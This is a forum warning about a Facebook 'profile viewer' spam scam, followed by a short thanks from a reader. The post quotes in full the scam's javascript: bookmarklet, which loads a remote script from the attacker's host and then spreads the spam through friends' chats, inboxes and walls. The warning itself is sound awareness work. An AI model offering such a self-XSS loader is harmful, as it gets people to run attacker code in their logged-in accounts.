What's new

"Who is Viewing Your Facebook Profile" Facebook Stalker spam

ebenzunlimited

Recently i got this notification "Allwin posted in your wall" (allwin is my friend).  So I visit my profile and see what he posted in my wall .  This is what i saw

"WOW! Its unbelieveable now you can really get to know who visits you on facebook anytime you like.. i can see my top visitors and i am so shocked that my EX is still creeping my photos every hour"

But he told me that he didn't post in my wall. He just click the link which is given in the message and follow the steps.  I realize that it is scam,  But this scam spreads faster.

How this scam post in other walls also without your knowledge?
if the one of your friends click the link because of curiosity.  The link can detect his IP address.  Based on the IP address , it will say display the info as:

"5 users are currently viewing your profile from Delhi.
Follow the Steps to Reveal them"

The above info is just fake.  if you follow the steps , you will become victim of this scam.

It will ask you to paste the JavaScript into the address bar while using the Facebook.  The javascript it ask you to enter is
javascript:(a=(b=document).createElement('script')).src='http://www.ajnachakra/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)

If you copy and paste bold text , It will show the malcious JavaScript.  This JavaScript spread the spam message by posting in

In the Chat Messages to Friends
    To the Inbox of Friends
    To the Walls of Friends
    At your own Wall

Fortunately , URL shorten service "is.gd" block the URL of the attacker.  So this spam message will not infect further. 

Conclusion

Beware of these type of spam messages.  Think before you click the link or using any application in Facebook.  Facebook does not create any tracker features now.  So Don't fall in attackers spam messages. 

I received quite a number of this mgs.... thanks for the warning